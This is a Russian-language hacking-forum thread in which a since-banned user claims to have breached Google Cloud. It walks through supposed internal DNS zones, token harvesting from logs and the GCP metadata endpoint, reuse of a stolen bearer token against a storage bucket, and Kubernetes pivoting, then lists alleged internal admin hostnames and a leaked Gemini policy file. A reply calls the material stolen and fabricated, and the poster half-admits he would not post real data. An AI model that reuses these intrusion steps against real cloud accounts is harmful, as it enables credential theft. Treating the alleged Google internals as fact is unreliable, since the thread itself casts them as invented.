• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом Гугла

Yakut

HDD-drive
Забанен
Регистрация
11.05.2025
Сообщения
28
Реакции
-1
Пожалуйста, обратите внимание, что пользователь заблокирован
google_internal_dns.zone

dump с gcp dns api —
вытянут zone list и записи через service token

внутри:
• *.corp.google.com
• ads.internal.gcp
• gemini-sched-dev.googleplex.com
• prod-analytics-mux.gce-internal



данные получены через:
gcloud dns managed-zones list --project $project
gcloud dns record-sets list --zone $zone
artifacts registry дал доступ к нескольким gs://gcp-artifacts-*
внутри:
• cloudbuild.yaml с деплоем ai-модулей
• docker-compose.override.yml для tensorflow-контейнеров
• requirements.txt с закрытыми библиотеками (gemini-core-private, google3-internal)

по структуре ясно — это внутренний деплой gemini/inference infra
через cloud audit logs получен timeline активности:
кто запускал Cloud Run
кто делал gcloud auth
где leak токенов (через open trace)
в одном проекте: gcloud logging read 'resource.type="gce_instance" severity>=ERROR'



в логах — обрывки JWT
можно собрать payload → dekod → email + scope
один токен привязан к svc-ai-deploy-prod@
перехвачен → использован → новые права
из firebase.json (слит через открытую storage bucket)

вытащена структура:

project_id: internal-dev-fb001
web API key: активен, нет ограничения по рефереру
authDomain: internal-dev-fb001.firebaseapp.com
storageBucket: открыт на чтение
databaseURL: активен
внутри firebase auth:
admin@google.com подтверждён
test-service@google.com с правами на admin.customClaims
через уже полученный токен сделан:
gcloud container clusters get-credentials $cluster
kubectl get pods --all-namespaces


факт:
вход → токен → pivot → grpc → storage → k8s → silence
цепь выстроена, откатов нет
данные лежат, сервисы молчат
внешне всё спокойно
И поехали
$ curl -s -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \

| jq



{

"access_token": "ya29.c.Kp0B...",

"expires_in": 3599,

"token_type": "Bearer"

}

$ export TOKEN="ya29.c.Kp0B..."
$ curl -s -H "Authorization: Bearer $TOKEN" \

"https://storage.googleapis.com/storage/v1/b/gemini-docs-prod/o/training-notes.md?alt=media"
# Gemini internal prompt policies, rev 2023.12
# Fallback logic (when refuse_score > 0.85):
# → reroute to PaLM backend
# List of restricted categories:
# - Elections (US/CA/EU)
# - Legal advice
# - Child-related content
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ключевые административные зоны:

admin.corp.google.com
trustboard.googleplex.internal
law-portal.google.internal
gsafe-control.google.internal
gerrit.corp.google.com
compliance-review.googleplex.internal
staging-moderation.gcp-internal.net
infra-root.corp.google.com


маршруты контроля и отгрузки политик:

content-policy-sync.gcp.google.internal
search-governance.googleplex.com
bard-moderation-node.internal.gemini.google
gemini-policy-checker.trust.google
gemini-feedback-store.internal
ads-routing-filter.googleplex.net
psa-flag-processor.gws-internal.net

dev и test зоны, где иногда забывают auth:

sandbox-tsp-review.stg.google.com
dev-autoflagger.trust.google
staging-ai-promptfilter.gemini-internal.com
test-escalation-console.googleplex.dev
preview-compliance-engine.gcp-staging.net

точки входа (не публичные, но живые)

authz-console.corp.google.com
key-management.googleplex.internal
access-review.trust.google
user-data-escalation.googleplex.net
тут решается, кому дать доступ, как ограничить контент, как быстро сработать по запросу государства


Тема будет дополнятся
 
Мужик, не стыдно пиздить материал?)
Источник хотя бы указывай...

https://t.me/z3roday8888
А вообще - это все пиздёшь для ибшников которые разгоняют новости🤗
 
Последнее редактирование:
благодарю тебя что ты процитировал это сюда)
но это мув, выкладывать реальные данные я бы не стал, но тот кто хочет тот в моих постах найдет для себя что нужно и решит верить в это или нет)))
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх